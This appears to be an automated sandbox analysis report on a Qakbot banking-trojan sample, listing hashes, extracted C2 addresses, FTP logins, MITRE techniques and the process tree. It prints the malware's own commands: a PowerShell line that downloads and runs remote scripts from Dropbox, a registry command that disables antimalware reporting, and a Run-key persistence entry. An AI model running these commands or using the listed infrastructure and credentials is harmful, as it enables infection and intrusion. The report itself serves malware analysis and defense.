qakbot | b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba

Analysis

max time kernel
148s
max time network
123s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
08-05-2024 02:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe
Size

536KB
MD5

4d9add7f38d2bfcfbc3d4bcf3f44e47d
SHA1

c9198de89705f6983a50c445ed1866a24cc9c846
SHA256

b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba
SHA512

06e86fdfd21bfc8b91f1489bda9e17e27e5bc6855a4f91753353d4d8fbcb645ccef8b70e92eb2e5ed7edad55e87fe75e7a597310e464354313d01a8a6a068d32
SSDEEP

6144:K3puL8eujbUcqbRI30RYAimlQY1KdZwzlW+2M0WybVGH/Itkug/i03s/nZYIVQV2:R8eSbcRYAplQYU3YlWOdT/pbqUVxg

Score

10^/10

qakbot 1524770894 banker execution persistence stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1

ps1.dropper

https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1

Extracted

Family

qakbot

Version

322.358

Campaign

1524770894

Credentials

Protocol: ftp
Host:
37.60.244.211
Port:
21
Username:
[email protected]
Password:
4AsEzIaMwi2d

Protocol: ftp
Host:
198.38.77.162
Port:
21
Username:
[email protected]
Password:
kJm6DKVPfyiv

Protocol: ftp
Host:
61.221.12.26
Port:
21
Username:
[email protected]
Password:
346HZGCMlwecz9S

Protocol: ftp
Host:
67.222.137.18
Port:
21
Username:
[email protected]
Password:
p4a8k6fE1FtA3pR

Protocol: ftp
Host:
107.6.152.61
Port:
21
Username:
[email protected]
Password:
RoP4Af0RKAAQ74V

65.40.207.151:995

98.242.248.219:443

96.248.7.111:443

24.240.178.42:995

67.141.64.98:443

12.166.108.82:995

47.223.79.196:993

73.48.132.91:443

24.209.130.208:443

216.16.14.19:443

173.81.42.136:443

209.213.24.194:443

69.129.91.38:443

185.219.83.73:443

70.182.79.66:443

68.49.120.179:443

73.222.54.231:443

66.189.228.49:995

98.190.205.8:443

216.21.168.27:32101

Signatures

Qakbot/Qbot
Qbot or Qakbot is a sophisticated worm with banking capabilities.
trojan banker stealer qakbot

Blocklisted process makes network request 4 IoCs

flow	pid	Process
5	2712	powershell.exe
6	2712	powershell.exe
7	2712	powershell.exe
8	2712	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
2620	ipivo.exe
2448	ipivo.exe

Loads dropped DLL 3 IoCs

pid	Process
1888	b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe
1888	b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe
2620	ipivo.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\mpfwhxwqg = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Ipivop\\ipivo.exe\""	explorer.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2712	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
780	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1888	b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe
3036	b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe
3036	b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe
2620	ipivo.exe
2712	powershell.exe
2448	ipivo.exe
2448	ipivo.exe
2464	explorer.exe
1080	taskhost.exe
2464	explorer.exe
1180	Dwm.exe
1212	Explorer.EXE
1888	b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe
2712	powershell.exe
2552	conhost.exe
2464	explorer.exe
324	cmd.exe
772	conhost.exe
780	PING.EXE
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe
2464	explorer.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2620	ipivo.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2712	powershell.exe

Suspicious use of WriteProcessMemory 60 IoCs

description	pid	Process	procid_target
PID 1888 wrote to memory of 3036	1888	b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe	28
PID 1888 wrote to memory of 3036	1888	b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe	28
PID 1888 wrote to memory of 3036	1888	b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe	28
PID 1888 wrote to memory of 3036	1888	b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe	28
PID 1888 wrote to memory of 2620	1888	b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe	29
PID 1888 wrote to memory of 2620	1888	b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe	29
PID 1888 wrote to memory of 2620	1888	b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe	29
PID 1888 wrote to memory of 2620	1888	b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe	29
PID 1888 wrote to memory of 2516	1888	b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe	30
PID 1888 wrote to memory of 2516	1888	b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe	30
PID 1888 wrote to memory of 2516	1888	b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe	30
PID 1888 wrote to memory of 2516	1888	b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe	30
PID 1888 wrote to memory of 2712	1888	b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe	32
PID 1888 wrote to memory of 2712	1888	b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe	32
PID 1888 wrote to memory of 2712	1888	b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe	32
PID 1888 wrote to memory of 2712	1888	b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe	32
PID 2620 wrote to memory of 2448	2620	ipivo.exe	34
PID 2620 wrote to memory of 2448	2620	ipivo.exe	34
PID 2620 wrote to memory of 2448	2620	ipivo.exe	34
PID 2620 wrote to memory of 2448	2620	ipivo.exe	34
PID 2620 wrote to memory of 2464	2620	ipivo.exe	35
PID 2620 wrote to memory of 2464	2620	ipivo.exe	35
PID 2620 wrote to memory of 2464	2620	ipivo.exe	35
PID 2620 wrote to memory of 2464	2620	ipivo.exe	35
PID 2620 wrote to memory of 2464	2620	ipivo.exe	35
PID 2464 wrote to memory of 1080	2464	explorer.exe	18
PID 2464 wrote to memory of 1080	2464	explorer.exe	18
PID 2464 wrote to memory of 1080	2464	explorer.exe	18
PID 2464 wrote to memory of 1180	2464	explorer.exe	20
PID 2464 wrote to memory of 1180	2464	explorer.exe	20
PID 2464 wrote to memory of 1180	2464	explorer.exe	20
PID 2464 wrote to memory of 1212	2464	explorer.exe	21
PID 2464 wrote to memory of 1212	2464	explorer.exe	21
PID 2464 wrote to memory of 1212	2464	explorer.exe	21
PID 2464 wrote to memory of 1888	2464	explorer.exe	27
PID 2464 wrote to memory of 1888	2464	explorer.exe	27
PID 2464 wrote to memory of 1888	2464	explorer.exe	27
PID 2464 wrote to memory of 2712	2464	explorer.exe	32
PID 2464 wrote to memory of 2712	2464	explorer.exe	32
PID 2464 wrote to memory of 2712	2464	explorer.exe	32
PID 2464 wrote to memory of 2552	2464	explorer.exe	33
PID 2464 wrote to memory of 2552	2464	explorer.exe	33
PID 2464 wrote to memory of 2552	2464	explorer.exe	33
PID 1888 wrote to memory of 324	1888	b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe	36
PID 1888 wrote to memory of 324	1888	b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe	36
PID 1888 wrote to memory of 324	1888	b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe	36
PID 1888 wrote to memory of 324	1888	b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe	36
PID 324 wrote to memory of 780	324	cmd.exe	38
PID 324 wrote to memory of 780	324	cmd.exe	38
PID 324 wrote to memory of 780	324	cmd.exe	38
PID 324 wrote to memory of 780	324	cmd.exe	38
PID 2464 wrote to memory of 324	2464	explorer.exe	36
PID 2464 wrote to memory of 324	2464	explorer.exe	36
PID 2464 wrote to memory of 324	2464	explorer.exe	36
PID 2464 wrote to memory of 772	2464	explorer.exe	37
PID 2464 wrote to memory of 772	2464	explorer.exe	37
PID 2464 wrote to memory of 772	2464	explorer.exe	37
PID 2464 wrote to memory of 780	2464	explorer.exe	38
PID 2464 wrote to memory of 780	2464	explorer.exe	38
PID 2464 wrote to memory of 780	2464	explorer.exe	38

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1080

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1180

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1212
- C:\Users\Admin\AppData\Local\Temp\b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe
  "C:\Users\Admin\AppData\Local\Temp\b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1888
- - C:\Users\Admin\AppData\Local\Temp\b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe
    "C:\Users\Admin\AppData\Local\Temp\b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe" /C
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3036
- - C:\Users\Admin\AppData\Roaming\Microsoft\Ipivop\ipivo.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Ipivop\ipivo.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:2620
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Ipivop\ipivo.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Ipivop\ipivo.exe" /C
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:2448
  - - C:\Windows\SysWOW64\explorer.exe
      C:\Windows\SysWOW64\explorer.exe
      4⤵
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2464
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
    3⤵
    PID:2516
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\zdxlfcykafgkxlepblevondalsjz.txt'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2712
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:324
  - - C:\Windows\SysWOW64\PING.EXE
      ping.exe -n 6 127.0.0.1
      4⤵
      Runs ping.exe
      Suspicious behavior: EnumeratesProcesses
      PID:780

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-759720614-114551988-10829642891142499248-1346065353-1708930420-1692500942159465668"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2552

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "6709464081603188433999079362-490326400938330376404741403446901449-173702388"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:772

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Ipivop\ipiv.dat

Filesize
92B

MD5
2ee74921ed7e6b2559788baae8ff936e

SHA1
df4f5e28c383ce7329049f2037af4be56e52a415

SHA256
e1d4df1660a5fcb96400289bc31e77a8f01c07e0237e785e70b125c849ffb74c

SHA512
c1db4ee38eba5c5968959b647a63269d2c45114cec0f7eab6cfae0c25b6f4a2fe051a12038aa6e4a6e3c59cb1399094f74dc2c21adb7b7d32689948db3a2abc0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Ipivop\ipivo.exe

Filesize
536KB

MD5
4d9add7f38d2bfcfbc3d4bcf3f44e47d

SHA1
c9198de89705f6983a50c445ed1866a24cc9c846

SHA256
b7a00ad06ccceff1cf5fe5c7fed8e0d43b456662721ec668f91681196a1cb3ba

SHA512
06e86fdfd21bfc8b91f1489bda9e17e27e5bc6855a4f91753353d4d8fbcb645ccef8b70e92eb2e5ed7edad55e87fe75e7a597310e464354313d01a8a6a068d32

Download Submit
memory/1080-42-0x0000000000350000-0x000000000037D000-memory.dmp

Filesize
180KB

Download
memory/1080-40-0x0000000000320000-0x000000000034C000-memory.dmp

Filesize
176KB

Download
memory/1080-44-0x0000000000380000-0x0000000000381000-memory.dmp

Filesize
4KB

Download
memory/1080-46-0x0000000000380000-0x0000000000381000-memory.dmp

Filesize
4KB

Download
memory/1080-47-0x0000000000320000-0x000000000034C000-memory.dmp

Filesize
176KB

Download
memory/1180-56-0x0000000000240000-0x000000000026C000-memory.dmp

Filesize
176KB

Download
memory/1212-71-0x0000000002DD0000-0x0000000002DFC000-memory.dmp

Filesize
176KB

Download
memory/1888-0-0x00000000003F0000-0x00000000003F6000-memory.dmp

Filesize
24KB

Download
memory/1888-80-0x00000000005B0000-0x00000000005D8000-memory.dmp

Filesize
160KB

Download
memory/1888-79-0x0000000000810000-0x0000000000811000-memory.dmp

Filesize
4KB

Download
memory/1888-75-0x00000000007E0000-0x0000000000809000-memory.dmp

Filesize
164KB

Download
memory/1888-1-0x0000000000400000-0x0000000000489000-memory.dmp

Filesize
548KB

Download
memory/1888-73-0x00000000005B0000-0x00000000005D8000-memory.dmp

Filesize
160KB

Download
memory/2448-35-0x0000000000400000-0x0000000000489000-memory.dmp

Filesize
548KB

Download
memory/2464-37-0x0000000000080000-0x00000000000EA000-memory.dmp

Filesize
424KB

Download
memory/2464-59-0x0000000000080000-0x00000000000EA000-memory.dmp

Filesize
424KB

Download
memory/2464-62-0x0000000000D20000-0x0000000000D4F000-memory.dmp

Filesize
188KB

Download
memory/2464-61-0x0000000000D20000-0x0000000000D4F000-memory.dmp

Filesize
188KB

Download
memory/2464-60-0x0000000000D20000-0x0000000000D4F000-memory.dmp

Filesize
188KB

Download
memory/2464-58-0x0000000000D20000-0x0000000000D4F000-memory.dmp

Filesize
188KB

Download
memory/2464-39-0x0000000000080000-0x00000000000EA000-memory.dmp

Filesize
424KB

Download
memory/2620-19-0x0000000000290000-0x0000000000296000-memory.dmp

Filesize
24KB

Download
memory/2620-36-0x0000000000400000-0x0000000000489000-memory.dmp

Filesize
548KB

Download
memory/2712-27-0x000000001B6A0000-0x000000001B982000-memory.dmp

Filesize
2.9MB

Download
memory/2712-28-0x0000000001F80000-0x0000000001F88000-memory.dmp

Filesize
32KB

Download
memory/3036-8-0x0000000000400000-0x0000000000489000-memory.dmp

Filesize
548KB

Download
memory/3036-7-0x0000000000300000-0x0000000000306000-memory.dmp

Filesize
24KB

Download